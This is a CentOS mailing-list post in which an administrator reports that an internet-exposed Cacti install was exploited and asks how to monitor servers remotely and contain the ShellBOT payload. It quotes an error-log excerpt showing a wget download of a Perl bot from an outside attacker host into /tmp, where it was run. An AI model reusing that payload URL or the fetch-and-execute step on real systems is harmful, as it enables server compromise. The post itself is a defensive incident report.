I'm just wondering what is the recommended way of monitoring servers and networks remotely. My current setup is to install and configure cacti and nagios. I've set these up to require SSL. This way, I can easily go to them and login from wherever I am and monitor (almost) everything I need to monitor.
The problem is that leaving cacti open was the most stupid thing I've done. After checking /var/log/httpd/error_log, I saw that someone exploited a cacti php file and the result was:
--08:13:11-- http://psaico.host.sk/desk.pl
=> `/tmp/desk.pl'
Resolving psaico.host.sk... 62.168.109.150
Connecting to psaico.host.sk|62.168.109.150|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,144 (20K) [text/x-perl]
0K .......... ......... 100% 28.26 KB/s
08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144]
which immediately downloaded ShellBOT to /tmp and executed it. It was a good thing I caught this as early as I did. So, what's everyone elses solution these days? Or is it simply a matter of creating a /tmp partition and mounting it noexec?
On a side note... anyone with experience with ShellBOT? From research, it seems to attempt to connect to an IRC server upon running. So if my outgoing connections are secured by iptables, can I assume it never got connected at all? I'll probably try this out someday but just looking for a quick experienced answer.
Thanks!
dex
_______________________________________________ CentOS mailing list CentOS@xxxxxxxxxx http://lists.centos.org/mailman/listinfo/centos